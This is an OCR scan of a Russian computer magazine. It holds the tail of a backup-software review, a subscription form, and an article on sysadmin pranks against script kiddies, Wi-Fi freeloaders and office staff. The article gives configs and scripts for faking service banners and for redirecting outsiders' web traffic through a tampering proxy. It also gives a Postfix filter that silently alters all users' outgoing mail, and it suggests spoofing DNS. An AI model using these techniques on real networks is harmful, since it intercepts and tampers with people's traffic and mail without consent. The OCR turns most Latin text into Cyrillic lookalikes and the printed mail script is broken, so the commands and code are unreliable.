ашапйа зГгеат Гер поѵѵаіГ атапсіа /изг/ІіЬ/ 

атапсіа / атапсіасі атапсіасі -аиГЬ=ЪзсІГср атсіитр 

В настройках сервера, в файле сИзкИзі, где указываются ре- 
сурсы, которые должны резервироваться, нужно прописать 
параметр: 

аиГЬ "ЬзсНсср" 



1 

> Ііпкз 

• Сайт проекта Васи Іа 
— Ьасиіа.огд.зі.пеі/ 
ргоіесіз/ЬасиІа 

• Сайт проекта 
ѴѴеЬасиІа — ѵѵеЬасиІа. 
зі.пеі/ги 

• Сайт проекта 
ВаскирРС — 

Ьаскиррс.зі.пеі 

• Сайт проекта 
ВохВаскир — 

ЬохЬаскир.огд 

• Сайт проекта Вохі — 
Ьохі.зі.пеі 

• Сайт проекта 

АМ АІ\І 0 А — атапсіа. 

огд.зі.пеі/ргоіесіз/ 

атапсіа 



Управление архивированием осуществляется стандарт- • Клиент /тапсіа 
ным образом, то есть команду дает сервер. Клиент ожидает ѴѴіпсІоѵѵз СІіепГ — 
подключение сервера на порту 10080/ІЮР или 10081/ 

ТСР, если используется КегЬегоз. Для передачи данных 

открывается новое соединение. В плане настройки сжатия ѴѴіпсІоѵѵз СІіепГ 
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Консольуправления Васиіа - ВАТ 



и шифрования данных АМЛЫБА — самая гибкая из систем этого обзо- 
ра. Обе операции можно выполнить как на клиенте, так и на сервере, 
в результате админ может более планомерно распределить нагрузку 
на системы и загрузку сети. Шифрование файлов производится при 
помощи СРС, по умолчанию эта функция отключена, но администра- 
тор самостоятельно устанавливает, кто, какой утилитой (атегурц СРС 
и т.д.) и с какими параметрами будет шифровать данные. Опционально 
также активируется шифрование потока между клиентом и сервером: 

кепегурк уез 

В правилах предусмотрено создание шаблонов файлов, которые долж- 
ны попасть в архив или исключаться из копии. Для удобства обычно 
используется несколько стратегий архивирования, позволяющих 
создавать полные или инкрементные копии в разных вариантах и выби- 
рать средство для архивации. Собственно процесс создания архивной 
копии запускается при помощи сгоп или вручную. 

Все настройки производятся в конфигурационных файлах сервера, их 
формат достаточно прост. В поставке есть несколько хорошо проком- 
ментированных шаблонов, что упрощает изучение. К сожалению, за 
весь период своего развития АМЛЫБА так и не обзавелась удобным 
графическим интерфейсом. Впрочем, многие админы считают, что ей 
он и не нужен. Хотя в коммерческой версии Атапба Епиегргізе Ебійоп 
предлагается СІЛ (2тапсіа Мапа^етепі: Сопзоіе), обладающий всеми 
необходимыми функциями для управления бэкапом в больших органи- 
зациях. 



Ш Г мішпіы : -ррі-д** © в - і5ч* 

*вг Ел Ѵнѵ Ісг-нкмі ШШшпаЛл Ьѵтоді Н№ 




Установка Васиіа в ІІЬипІи достаточно проста 

Но если процесс создания резервной копии в АМАИБА достаточно про- 
зрачен, то обратная процедура — восстановление данных при помощи 
утилиты атгесоѵег, требует некоторой сноровки, и новичку, вероятно, 
не понравится: необходимо последовательно указать имя задания, 
узел, диск, просмотреть список файлов и затем восстановить выбран- 
ные. Хотя спасает то, что в большинстве случаев архивные копии так и 
остаются невостребованными. 

ЗАКЛЮЧЕНИЕ 

Как видишь, хорошую систему бэкапа можно собрать и из бесплатных 
компонентов, при этом она не будет уступать своим коммерческим 
собратьям. Победителя определять не станем, каждая система имеет 
свои плюсы и минусы, и в разных конфигурациях на первый план 
будут выходить различные функциональные возможности. Здесь уже 
лучше определиться, что нужно в конкретном случае, и выбрать свой 
вариант, ц-с 
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БУДЬ УМНЫМ! 

ХВАТИТ ПЕРЕПЛАЧИВАТЬ В КИОСКАХ! 
СЭКОНОМЬ 660 РУБ. НА ГОДОВОЙ ПОДПИСКЕ! 

Замучилися искать журнал в палатках и мага- 
зинах? Не хочешь тратить на это время? Не 
надо. Мы сами потратим время 
и привезем тебе новый выпуск X. 

Для жителей Москвы (в пределах МКАД) 
доставка может осуществляться 
бесплатно с курьером из рук в руки 
в течение трех рабочих дней с момента 
выхода номера на адрес офиса или 
на домашний адрес. 




Еще один удобный способ оплаты 
подписки на твое любимое издание — в любом 
І^ІѴѴІ из 72 000 платежных терминалах ОІѴѴІ (КИВИ) 
по всей России. 



ЕСТЬ ВОПРОСЫ? Звони по бесплатным телефонам 
8(495)780-88-29 (для москвичей) и 8(800)200-3-999 
(для жителей других регионов России, абонентов 
сетей МТС, БиЛайн и Мегафон). 

ВОПРОСЫ, ЗАМЕЧАНИЯ И ПРЕДЛОЖЕНИЯ ПО ПОДПИСКЕ НА ЖУРНАЛ 
ПРОСИМ ПРИСЫЛАТЬ НА АДРЕС іпГоІсРфс.ги 




ЭТО ЛЕГКО! 

1. Разборчиво заполни подписной купон и 
квитанцию, вырезав их из журнала, сделав 
ксерокопию или распечатав с сайта 

зііор.діс.ги . 

2. Оплати подписку через любой банк. 

3. Вышли в редакцию копию подписных доку- 
ментов — купона и квитанции — любым из 
нижеперечисленных способов: 

• по электронной почте $иЬзсгіЬе@дІс.ги; 

• по факсу 8 (495) 780-88-24; 

• по адресу 119021, Москва. 

ул. Тимура Фрунзе, д. 11, стр. 44. 

ООО «Гейм Лэнд», отдел подписки. 

ВНИМАНИЕ! 

Подписка оформляется 
в день обработки купона и квитанции 
с номера, выходящего через один 
календарный месяц после оплаты. 

Например, если произвести оплату в январе, 
то подписку можно оформить с марта. 

СТОИМОСТЬ ЗАКАЗА: 

2100 РУБ. ЗА 12 МЕСЯЦЕВ 
1200 РУБ. ЗА 6 МЕСЯЦЕВ 

Единая цена по всей России. Доставка 
за счет издателя, в том числе курьером 
по Москве в пределах МКАД 




■ 




ПОДПИСНОЙ КУПОН 

ПРОШУ ОФОРМИТЬ ПОДПИСКУ 
НА ЖУРНАЛ « 



□ на 6 месяцев 
| | на 12 месяцев 
начиная с 


20 г. 


^ прошу выслать бесплатный 
номер журнала 





I — I Доставлять журнал по почте 
' — ' на домашний адрес 

Доставлять журнал курьером : 

□ на адрес офиса* 

I I на домашний адрес** 

(отметь квадрат выбранного варианта подписки) 

Ф.И.О. 



Извещение 



ИНН 



7729410015 



ООО «Гейм Лэнд» 



ОАО «Нордеа Банк», г. Москва 



р/с N° 40702810509000132297 



к/с № 30101810900000000990 



БИК 044583990 




КПП 770401001 


Плательщик 


Адрес (с индексом) 


Назначение платежа 
Оплата журнала « 


» 


Сумма 


с 


20 г. 





АДРЕС ДОСТАВКИ: 

индекс 

область/край 

город 

улица 

дом корпус 

квартира/офис 

телефон ( ^ ) 

е-таіі 

сумма оплаты 

*в свободном поле укажи название фирмы 
и другую необходимую информацию 
**в свободном поле укажи другую необходимую информацию 
и альтернативный вариант доставки в случае отсутствия дома 

свободное поле 



Кассир 



Ф.И.О. 

Подпись плательщика 



Квитанция 



ИНН 7729410015 



ООО «Гейм Лэнд» 



ОАО «Нордеа Банк», г. Москва 
р/с № 40702810509000132297 



к/с № 30101810900000000990 



БИК 044583990 




КПП 770401001 


Плательщик 


Адрес (с индексом) 


Назначение платежа 
Оплата журнала « 


» 


Сумма 


с 


20 г. 





Кассир 



Ф.И.О. 

Подпись плательщика 
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I Евгений Зобн 



]] тгазупаск.ги 



Адми некие 
забавы 

ГЛУМИМСЯ НАД КУЛХАЦКЕРАМИ И СОТРУДНИКАМИ ОФИСА 

Когда все настроено и работает как часы, когда пользователи довольны, 
а босс недостает постоянными просьбами и вопросами, когда все ману- 
алы прочитаны, а в контре нетравных, настаеттоска, и чтобы спастись 
отнее, админ включаеттворческое мышление и начинаетпридумывать 
всевозможные виды пранка, чтобы поглумиться над коллегами и теми, 
кто пытается пробраться в его серверы. 



Сисадминский пранк может быть направлен 
в три почти противоположных по значению и 
последствиям стороны: 

1. Кулхацкеры. Различные издевательства 
над скрипт-кидди, включающие в себя такую 
классику, как подмена баннеров сетевых 
сервисов и шутки с брандмауэром. Все это не 
только позволит развеселить себя любимого, 
но и нередко удостаивается всяческих похвал 
со стороны коллег, а иногда даже и начальс- 
тва. 

2. Коллеги-админы. Имея равные права на 
управление серверами с другими админами, 
ты можешь запросто устроить западло и им 
тоже. Однако здесь не все так просто, как с 
предыдущим пунктом. Портя жизнь другим 
админам, ты можешь усугубить любую не- 
предвиденную ситуацию, возникшую в сете- 
вой инфраструктуре. Как результат: лишение 
премии обоих, а в особо сложных ситуациях, 
увольнение и синяк под глазом. 

3. Сотрудники офиса. Жертвой пранка 
может стать и весь офисный планктон вместе 
взятый. Имея полный контроль над файрвола- 
ми, маршрутизаторами и прокси-серверами, 
ты сможешь здорово себя повеселить, однако 
когда дело дойдет до разбирательства, возмож- 
ны и особо горькие последствия, начиная от 
увольнения без рекомендаций и заканчивая 
рукоприкладством с кровопролитием (в поне- 
дельник утром людей лучше не злить) . 

Стоит также отметить, что некоторые виды 
приколов могут быть направлены в любую 

из трех сторон хоть одновременно, хоть по 
отдельности. 
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ДУРАКАМ ЗДЕСЬ НЕ МЕСТО 

Разобравшись с теорией, переходим к прак- 
тике, а конкретно к первой части статьи, в 
которой жертвами становятся незадачливые 
кулхацкеры. Начнем с самого простого и рас- 
пространенного трюка — подмены баннеров 
сетевых сервисов. В качестве защиты от атак 
это работает плохо, зато, если с фантазией все в 
порядке, можно хорошенько поиздеваться над 
несмышлеными «взломщиками». 

Итак, попробуем исправить приветственное 
сообщение, выдаваемое наиболее распростра- 
ненными сервисами, а конкретно: Йрб, зппрб 
и Ьнрб, бп$. Конечно, далеко не все админы 
используют в своих системах стандартные 
сервисы, одни предпочитают РгоРТРб, другие, 
например, ѵзКрсі, поэтому мы остановимся 
на самых распространенных и популярных 
вариантах: 

• РгоРТРб. Открываем конфигурацион- 
ный файл /ебс/ргоібрб. сопі и присваи- 
ваем значение "Меісоте Во Місго-РТРб 
0.23 (03/2 3.3)" опции ЗегѵегЫаше. 

• ѵзібрб. Открываем файл /ебс/ 
ѵзібрб/ѵзібрб. сопі и добавляем 
в него следующую строку: " ібрб_ 
Ъаппег=№е1соте Ро ОпіхРТРБ (ѵегзіоп: 
22.1, ОЗ: 386ВЗБ 4.3) ". 

• ЬідНТТРб. Открываем /еРс/ 

ІідйРРрб . сопР и изменяем значение 
опции зегѵег.Рад на "МісгозоРР- 
ІІЗ/З.З.З.З.З" . 



• Зепбтаіі. Открываем макрос /еРс/ 
таіі/зепбтаіі .тс и добавляем в него 
следующую строку: 

беііпе ( ѵ сопРЗМТР_ЬОСШ_МЗС' , 
'ехсйапде . згѵ. Іосаі МісгозоРР МАІЬ 
Зегѵісе, Ѵегзіоп: 6.0.3790.1830 
геабу ' ) бпі 

Сохраняем и генерируем конфигураци- 
онный файл : 

# сб /еРс/шаіІ 

# т4 зепбшаіі.тс > зепбтаіі.сі 

* РозРРіх. Открываем /еРс/розРРіх/ 
шаіп.сР, ищем опцию зтРрР_Ьаппег и 
заменяем ее значение на строку "ѴАХ 
НТТРБ 3 . 31-ЬеРа (МЗ-БОЗ 5.3, дсс 
1 . 1 )" 

* Віпб. Конфиг /еРс/Ьіпб/пашеб. сопР , 
строка : 

орРіопз { 

ѵегзіоп "8.2.2"; 

} ; 

Напомню: версия ВШБ 8.2.2 примечательна 
тем, что содержит серьезные уязвимости, 
позволяющие злоумышленнику отравить 
кэш ОНЗ-сервера, провести Оо5-атаку и даже 
получить привилегии гооР Хорошая наживка 
длякиддисов. 

Для изменения баннеров некоторых сервисов 
придется править исходники, например, 
баннер АрасКе исправляется с помощью 
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редактирования заголовочного файла іпсІисІе/арыеІеазе.Ь. (строка 
#с1еЯпе АР_5ЕКѴЕК_ВА5ЕРКСЮиСТ " АрасЬе " ) . Хорошие результаты 
дает также использование различных «заглушек», которые прикиды- 
ваются настоящими сервисами, на самом деле ими не являясь. Они 
получили широкое распространения в разного вида Ьопеурог-систе- 
мах, но могут применяться и для организации качественного пранка. 
Ниже приведен код фиктивного зпнр-демона, который правильно ус- 
танавливает соединение, а затем без видимых причин его разрывает: 

$ѵПаке-5тірсі.рІ 

# ! /изг/Ъіп/регІ 

изе Зоскек; 

$рогк=25 ; 

$кюзкпате= "кюзк . сот" ; 

$Ьаппег= "22 0 кюзк . сот ЕЗМТР Зепсітаіі 8 . б . 1/8 . 5 . 0\п\г " ; 

$каі1="500 Соттапсі ипгесодпігесі: " ; 

[ зкірресі... ] 

( $ак , $рогк , $іпекаскіг ) =ипраск ( $зоска(Мг , $аскіг) ; 
@іпекасіс1г=ипраск ( ' С4 ' , $іпекасіс1г) ; 

( $І1 , $І2 , $ІЗ , $І4 ) =@іпекас!с1г ; 

$ірас!с1г= " $І1 . $І2 . $ІЗ . $І4 " ; 
ргіпк "соппескесі кгот $ірас!с1г\п" ; 

ргіпк N3 $Ьаппег; 
ѵіЬіІе (Ш3>) { 
ік ( /ЕНЬО/і ) { 

ргіпк N3 "Неііо $іраскіг. пісе ко теек уои\п\г" ; 

} еізе { 

ргіпк N3 "$каі1 $_\г" ; 

ргіпк "кгіесі $_" ; 

} 

} 

ргіпк " $ірасісіг с!ізсоппескес1\п" ; 

} 



Ты можешь сказать, что это глупая и бесполезная штука, но только 
представь, каких мук будет стоит взлом скрипта. Сервер не обрабаты- 
вает команд, поэтому незадачливому «хакеру» будет стоит больших 
усилий определить, почему это происходит. А как он будет перебирать 
все имеющиеся эксплойты, печально осознавая, что ни один из них 
не подходит. . . А если в код добавить возможность ответа на команды 
или встроить полноценный чат-бот? В общем, огромный простор для 
экспериментов. 

Если на машине функционирует только один сервис (например НТТРб), 
то можно пойти еще дальше и сделать так, чтобы инициация подклю- 
чения к любому порту автоматически перенаправлялась на порт этого 
сервиса. Ытар и любые другие сканеры портов просто сойдут сума: спи- 
сок открытых портов будет включать в себя все возможные варианты, 
слушающие сервисы будут вести себя совсем не так, как предполагается 
(ТСР вместо ІЮР, странная строка ответа и т.д.) Естественно, незадачли- 
вого новичка такое положение дел надолго ввергнет в шок. 

В то же время реализация идеи очень проста, незатейлива и требует вы- 
полнения всего трех команд, модифицирующих правила брандмауэра: 

# іркаЫез -Р ШРОТ БКОР 

# іркаЫез -А РКЕКСУОТШС -к пак -р кср ! --Орогк 80 \ 

-з КЕБІКЕСТ --ко-рогк 80 

# іркаЫез -А ШРИТ -р кср --зуп --Орогк 80 \ 

-т соппіітік ! --соппІітік-аЬоѵе 10 -3 АССЕРТ 

Второе правило перенаправляет весь трафик к портам, отличным от 80- 
го, на 80-ый же порт. Третье правило ограничивает количество одновре- 
менных соединений до 10. Нужно это просто для того, чтобы ѵѵеЪ-сервер 
не смог попасть в состояние Бо5. 

Защита самого ѵѵеЪ-сайта от нападок скрипт-кидди и троллей тоже 
может принести немало удовольствия. Например, попав под обратный 
зІазМои-эффект (когда кто-то публикует ссылку на твой ресурс на дру- 
гом сайте с целью поглумиться и нагадить) , не стоит сразу блокировать 
всех посетителей, пришедших со злонамеренного ѵѵеЪ-сайта. Гораздо 
эффектнее будет выглядеть перенаправление их на другую страницу 
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ЗУИ/АСК 



* Ехашріе: "АрасГіе/І.і.Ѳ НгНігідеі/Ѳ.і-аірЬа" 

*/ • 

#бе^іпе А Р_5 Е РѴ ЕЯ_8 А 5 Е V Е N0 ОН "АрасНе БоПиаге РоипбаІіогГ 
#беііпе АР_5ЕЯѴЕК_8АБЕРРШЕСТ я А рас Не НИР Бегѵег" 
7/#сІеТіпе А Р_5 ЕК V Е К ВА 5 Е Р КО 011 СТ ,і АрасНе ,> 



гаеііпе АР_5ЕЯѴЕК_ВА5ЕРК0ОиСТ ,, МІСГ 050 П-ІІ 5 / 3 . 3 . 5 Н 



#сІе^і пе АР_БЕЯVЕЯ_МА^0ЯVЕР5I0^^_N^МВЕР 2 
#сІеііпе АР БЕЯѴЕР М ІМОЯѴЕРБІ0М МІІМВЕЯ 2 
#беііпе А Р_5 Е Я V ЕК_Р А ТО НІ_ Е V ЕІМІІ М8 ЕВ 15 

#ЙеТ1пе АР_БЕНѴЕК^ЕѴВиіІ_О_В00І_ЕАМ 0 

#і і А Р_5 ЕЯ ѴЕ ВО Е ѴВи И 0_В 00 І_ Е А N 

#беіі пе А Р_5 Е ЯѴ ЕЯ_ А 0'0_5ТКІ N С * - сіе V 4 

#е1зе 

#беТіпе А Р_Б Е ЯѴ ЕЯ_А 00_5ТЯІ N С 
#епгііТ 

/* кеер оісі гпасгоз аз меіі */ 

| 



|~/1тр/П1:1:рб-2 . 2 . 15/ ІПСІибе/ар_геІеазе . Іі [ срр] 35 0x23 [45 Д] [60%] 



Исправляем баннер АрасНе в исходниках 



(или сайт) , сделанную специально для издева- 
тельства над ними. Далее приводится список 
действий, необходимых для осуществления 
этой задачи. 

Открываем файл .Ьхассезз и добавляем в него 
следующие правила: 

КеілпгібеЕпдіпе оп 
КеѵпгібеСопб % {НТТР_КЕЕЕКЕК} 

'''Нббр : / /тт\ . еѵі 1 \ .пеб [N 0 ] 
КешгібеКііІе . * Нббр : //ѵтѵі. доодіе . 
сот [К] 

Во второй строке происходит проверка 
переменной НТТР_КЕЕЕКЕК и поиск в ней 
регулярного выражения, соответствующего 
любой странице сайта ѵуѵуѵу. еѵіі . пен ([N0] — это 
«по сазе»: 1Ш1 может быть написан в любом 
регистре символов) . Если проверка дает 
положительный результат, все тролли уходят на 
страницу, адрес которой указан в третье строке 
(в примере это ^оо^іе.сот , однако лучше найти 
более подходящую контексту страницу) . 

Теперь поговорим о тех, кто любит воровать. 

За последнее время сети ѴѴі-Рі получили очень 
широкое распространение, свободные точки 
доступа теперь можно найти даже в небольших 
городах, ѴѴі-Рі модули устанавливаются в не- 
тбуки и сотовые телефоны, весь мир поголовно 
переходит на сотовую связь четвертого поко- 
ления. Однако развитие беспроводной связи 
несет в себе и проблемы: люди любят халяву, и 
если в твоем доме /офисе есть открытая точка 
доступа, то кто-нибудь обязательно ей восполь- 
зуется. Конечно, для борьбы с похитителями 
можно активировать шифрование и принуди- 
тельную авторизацию, но если трафик не име- 
ет особого значения, открытый доступ можно 
использовать для глумления над ворами. 
Следующий прием был впервые опублико- 
ван на странице ѵѵѵѵѵѵ.ех-раггоб сот /репе/ 
ирзібе-боѵѵп-ЩгпеЕЬнтІ. и на русский язык его 
название можно перевести как «перевернутый 



тырнет». Суть заключается в следующем: на- 
страиваем сервер так, чтобы «чужие» клиенты 
попадали в отдельную подсеть, все пакеты из 
которой будут перенаправлены на внутренний 
прокси, коверкающий их содержимое. Ниже 
мы рассмотрим, как такое проделать. 
Настроим ОНСР-сервер, раздающий адреса 
клиентам беспроводной сети. Чтобы схема 
заработала, мы должны поместить воров в 
отдельную подсеть. Делается это с помощью 
следующего набора правил файла сііісрб. 
сопі: 

# ѵі /еіс/сІКісрсІ.соп^ 

### Стандартные настройки 
ббпз-ирбабез обб; 
ббпз-ирбабе-збуіе іпбегіт; 
аибЬогібабіѵе; 

зПагеб-пебілгогк Іосаі { 

### Наша "настоящая" подсеть 
зиЬпеб *.*.*.* пебтазк 
255.255.255.0 { 

гапде *.*.*.* *.*.*.*; 
орбіоп гоибегз *.*.*.*; 
орбіоп зиЬпеб -тазк 
255.255.255.0; 

орбіоп ботаіп-пате "туботаіп. 

ги " ; 

орбіоп сіотаіп-пате- зегѵегз 

* * * * . 

бепу ипкпоѵт-сііепбз ; 

### Перечисляем легальных клиен- 
тов 

бюзб сііепбі { 

### МАС-адрес клиента и его 
ІР-адрес 

Пагбыаге ебкегпеб 

*.*.*.*.*.*. 

біхеб-аббгезз *.*.*.*; 

} 

} 



> іеігіе* ІосаІЬоаі: 25 
Тгуіпд 127.0.0. 1. . . 

Соппесіегі Іо ІосаІІіозі. 

Еісаре сНагасІег іа , ' ѵ ]'. 

220 Ьов 1: . сот Е5НТР 5еп гітаіі 8 - 6 . 1 / 8 , 5 . 0 
НЕЮ 

ЗОЙ Сошлют! ітгесодпііееі; НЕСО 
МАІб РРЮМз <хакер@какер .ги> 

500 Сощтапгі ипгесйдлігасі: МАИ РРДМ ; <хакердосакер. го> 

0 АТА 

500 Соттапс) ипгесодпігей: ОАТА 
ООН 

500 Соіптапй ипгесодпігесі: ООП 

1 

БМТР-сессия с подставным 5МТР- 
демоном 

### Подсеть, открытая всем, паке- 
ты, пришедшие из нее, 

### будут направлены на наш прок- 
си-сервер 

зиЬпеб 192 . 168 .0.0 пебтазк 
255.255.255.0 { 

гапде 192 . 168 .0.2 

192.168.0. 10; 

орбіоп гоибегз 192.168.0.1; 
орбіоп зиЪпеб-тазк 
255.255.255.0; 

орбіоп ботаіп-пате- зегѵегз 

192.168.0. 1; 

а11оѵ7 ипкпоѵт-сііепбз ; 

} 

} 

Перезагружаем сііісрсі: 

$ зибо зегѵісе бПсрб гезбагб 

Теперь настроим 5^иіб, который будет 
заниматься обработкой НТТР-трафика, 
пришедшего от нелегальных пользовате- 
лей: 

$ зибо арб-деб іпзбаіі здиіб 

Открываем конфигурационный файл /еіс/ 
5^шб/5^иіб.сопіи делаем несколько исправле- 
ний (не удаляя содержимое) : 

#ѵі/е(с/5яиісІ/5диісІ.сопТ 

### Открываем доступ всем клиентам 
нашей доступной для всех подсети 
асі Іосаіпеб зге 192.168.0.0/24 
Пббр_ассезз аііоот Іосаіпеб 

### Делаем прокси невидимым 
Пббр_рогб 3128 бгапзрагепб 

### Пропускаем трафик через скрипт 
иг1_геѵпгібе_ргодгат /изг / Іосаі /Ьіп/ 
біір.рі 

Создаем скрипт Пір.рі, который будет извра- 
щаться над трафиком: 

# ѵі /изг/ІосаІ/Ьіп/Шр.рІ 

# ! /изг/Ьіп/регІ 
$ 1 = 1 ; 

$соипб = 0; 
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5 ! /лжШ-Г/Ъ іл/рчті 

-1і 

ж Оі 

«Ыіл № і 



И ( — П .'ѴІР9І/ІІ < 

- г !. * ]; 

ЯуаІмииСѴиэ-г/ЬіП/ив^Ь", "’Ч". ш , ш ІЧяГ-1*М*/іМЛфша/ ѵі ■ . “ ")І 

яул^ивЦ “/ьга Г/Ь іл/и>я “ - *1ір“ л * /ч»г/ѵт( іла^аа/ орд'}; 

ргіпг ТЫХр://Ц!Т-0.0 Л/івяра^/ і і-' 1.1»\п": 

> 

*і*и \ ^ /{.л.діо/іі < 

-...Л ш : 

зуэ-ЕваС’/иаг/Ыл/ивв^'" , ".д ч . "-0" і т '/чшг/'імш/ішлдаа/ у11 т \ 4 : 

9 Ѵм* г/Ьід/шч гііу 4 . ч *Пі; р н .*/члг /•***/ іяадшя/ - .діІ н }; 

рг іпі т*11р : / / 1ЭТ ,0,0, 1/і»ия*/ : і- ■ -ді^\п н : 

} 

*1*И і »- Н, я \.рпді/Ц і 

з-ѵгі * ■ . ; 

эуэЪи>( Ѵіл г/й т/мдя V , т -Ц т л “ "О 4 л ш ?ѵтГ/*ны/ ігндея/ рпд“ , 4 Л); 

зул-Е«ш( "/ияг/йт/пс-д гіТу“ , “’Лір“ і “/ѵвг/'іЛ(»^іщадка/ -рпд“}; 

ргіл^ ІШрШІСТ.О . @ 4/Індн^ ' .ргсдѴі"; 

> 





Скрипт Нір.рі легко исправить для дости- 
жения других эффектов над изображени- 
ями 



$рісі = $$; 
ѵ/МІе (о) { 
сЪотр $_; 

і* ($_=-/( . *\ орд) /і) { 

$иг1 = $1; 

зузкеш ( " /изг/Ъіп/мдек " , "-д", " -О","/ 
ѵаг/ѵллм/ішадез/$рісі-$соипк . зрд" , " $иг1 " ) ; 

зузкет ( " /изг/Ъіп/тодгіку " , " -€1ір" , " / 
ѵаг/ѵ™плг/ітадез/$ріс1--$соипк . зрд" ) ; 
ргіпк "кккр: //127 .0.0. 1/ішадез/$ріс1-$соипк . зрд\п" ; 

} 

еізік ($_ =~ / ( . * \ . дік ) /і ) { 

$иг1 =$1; 

зузкет ( " /изг/Ъіп/мдек " , "-д", " -О","/ 
ѵаг/ѵ™плг/ітадез/$рісі-$соипк . дік м , " $иг1 " ) ; 

зузкет ( " /изг/Ъіп/тодгіку " , " -кіір" , " / 
ѵаг/шш/ітадез/$рісі-$соипк . дік" ) ; 

ргіпк "Ъккр : //127 . 0 . 0 . 1/ітадез/$ріс1- 
$соипк . дік\п" ; 

} 

еізе { 

ргіпк " $_\п" ; ; 

} 

$соипк++ ; 

} 

Даем скрипту права на исполнение : 

$ зисіо сЪтосі +х /изг/ІосаІ/Ьіп/ІІір.рІ 

Просим 5^иісі перечитать конфиг: 

$ зисіо зегѵісе здиісі геіоасі 

Устанавливаем веб-сервер, который будет отдавать изобра- 
жения, обработанные скриптом: 

$ зисіо арк-дек іпзкаіі арасЪе2 

Создаем каталог для хранения изображений: 

$ зисіо шксііг /ѵаг/ѵллм/ітадез 

$ зисіо сЪоѵт ѵллм-сіака : ѵллм-сіака /ѵаг/ѵллплУ ітадез 
$ зисіо сЪтосі 7 55 /ѵаг/ѵлтм/ітадез 

Чтобы веб-сервер смог получить к ним доступ, добавляем 
пользователя ѵѵѵѵѵѵ-сіага в группу рюху (изображения 




На хакер. ги есть два флеш-баннера, поэтому эффект пере- 
вернутого тырнета не так сильно заметен, зато доодіе.сот 
выглядит просто прекрасно 



будут добавлены скриптом от имени этого пользователя и 
группы) : 

$ зисіо изегшосі -аС ргоху ѵл^лѵ-сіака 

Перезапускаем веб-сервер: 

$ зисіо зегѵісе арасЪе2 гезкагк 

Наконец, настраиваем перенаправление трафика с помо- 
щью іргаЫез: 

$ зисіо іркаЫез -к пак -А РОЗТКОПТШО \ 

-3 МАЗОБЕКАБЕ 

$ зисіо іркаЫез -к пак -А РКЕКОБТШС -р кср \ 
--сірогк 80 -3 КЕБІКЕСТ --ко-рогк 3128 

Это все. Теперь НТТР-трафик, пришедший от клиентов 
открытой подсети, будет перенаправлен в 5^иіб и обработан 
нашим скриптом, который делает ни что иное, как перево- 
рачивание всех изображений веб-страницы, сохранение 
их в локальном каталоге /ѵаг/ддчдчу/іта^ез с последующей 
отдачей вместо оригиналов с помощью локального веб-сер- 
вера. На скриншотах отчетливо видно, как будет выглядеть 
веб-страница в окне браузера похитителей интернет-тра- 
фика. 

ВЕСЕЛИМ ДЕТИШЕК 

Кому как не админам издеваться над рядовыми пользовате- 
лями. Имея полную власть над сетевой инфраструктурой, 
ты можешь вытворять с пользователями все что угодно. 
Например, редактировать их почту. 

Написав небольшой скрипт для РозШх, мы сделаем так, 
чтобы к любому сообщению, пересылаемому с помощью 
нашего сервера, добавлялась небольшая оригинальная 
подпись. Для этого заводим пользователя Шіег, с правами 
которого будет работать наш скрипт: 

$ зисіо асМизег кіікег 

Создаем каталог, где будет происходить обработка коррес- 
понденции: 

$ зисіо шксііг /ѵаг/зрооі/ кіікег 
$ зисіо сЪоші кіікег : кіікег /ѵаг/зрооі/кіікег 

Настраиваем передачу почты через нашего агента. Для 
этого добавляем приведенную ниже строку в файл /егс/ 
розГйх/тазГег.сС 




Способов глумления 
над коллегами сущест- 
вуетуйма, начиная от 
подмены стандартного 
приглашения ЬазЬ 
и заканчивая забива- 
нием логов различным 
мусором. Большинс- 
тво этих приемов уже 
были описаны в статье 
«Пощады не будет!» 
(][_1 1_2009], поэтому 
сегодня эта тем а не 
затрагивается. 




> СІѴСІ 

На прилагаемом 
кжурналу диске ты 
найдешь скрипты 
ба ке-зтірсі . рі 
и Кір.рі. 
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► 123 








5ѴМ/АСК 



Г 



оріііопз { 

ѵегзіоп // гешоѵе ІЬіз Ро аііоѵ ѵегзіоп чиегіез 

іізіеп-оп { апу; } ; 

Іізѣеп-оп-ѵб { попе; }; 

іпіегіасе-іпСегѵаІ 0; 

ешрРу- 20 пез-епаЫе по; 

іогѵагсіегз { 212 . 34 . '■ "■ . 212.34. }; 

} ; 

сопРгоІз { 

іпеР 127.0.0.1 аііоѵ { 127.0.0.1; } кеуз { "гпйс-кеу"; }; 

} ; 

Іоддіпд { 

саРедогу Іагае-зегѵегз { пиіі; }; 

} ; 

/ѵаг/патей/еСс/ пашей . сопі 31,0-1 



Скрываем версию ВІЫй 



біібег ипіх - п п - 10 ріре :Е1адз=Кд изег=:Еі1бег агдѵ=/ 
изг/іосаі/біп/таіі-біібег . зЬ 

Создаем скрипт таіІ-Шіег.зЬ. и наполняем его содержимым: 

# ѵі /изг/ІосаІ/Ьіп/таіНіиег.зН 

# ! /Ъіп/зЬ. 

### Стандартные пути 
І№РЕСТ_БІК=/ѵаг/зроо1/бі1бег 
8ЕББМАІЬ= " / изг/ зЬіп/ зепбтаіі -і" 

### Коды возврата 
ЕХ_ТЕМРЕАІЬ=7 5 
Е Х_ІЖ АѴА I Ь АВ Б Е = 6 9 

### После обработки убираем мусор 
бгар " гш -б іп. $$" 0 1 2 3 15 

### Переходим в каталог фильтра 
сб $ШЗРЕСТ_БІК | | ехіб $ЕХ_ТЕМРЕАІБ ; 

### Сохраняем сообщение в файл 
саб > іп.$$ | | ехіб $ЕХ_ТЕМРЕАІЬ; 

### Добавляем к нему нашу подпись 

есЬо " ХпБольшой брат следит за тобой. . . " > іп.$$ 

### Отдаем письмо зепбтаіі 1 у 
$ЗЕШМАІЬ "$@" < іп.$$ 

ехіб $? 

Даем пользователям права на исполнение скрипта: 



$ зибо сПтоб +х /изг/ІосаІ/Ъіп/таіІ-біІбег . зП 

Перезагружаем конфиг и наслаждаемся результатом: 

$ зибо зегѵісе розббіх геіоаб 

Сервер зтіірб будет принимать почту из сети и передавать ее нашему 
фильтру через агента доставки ріре (то есть просто передавая тело 
сообщения на вход) . С помощью команды есЬо фильтр добавит в письмо 
наше сообщение («Большой брат следит за тобой...») и отдаст его 
зепбтаіі. Таким образом получится двойная очередь (розіііх - скрипт - 
розіііх) . 

Можно подготовить целую серию шуток, например отдачу одного 
и того же ІР-адреса в ответ на любые БЫЗ-запросы, тогда набирая 
в адресной строке браузера про извольный адрес, юзер будет 
всегда попадать на какой-нибудь ѵѵѵѵѵѵ.ЫЫ^оп.сот . Ты можешь 
сделать скриншот главной страницы ^оо^іе.сот. вставить его 
в пустую Ьілпі-страницу, повесить ее на локальном веб-сервере 
и сделать перенаправление всех запросов к 80-му порту на свой 
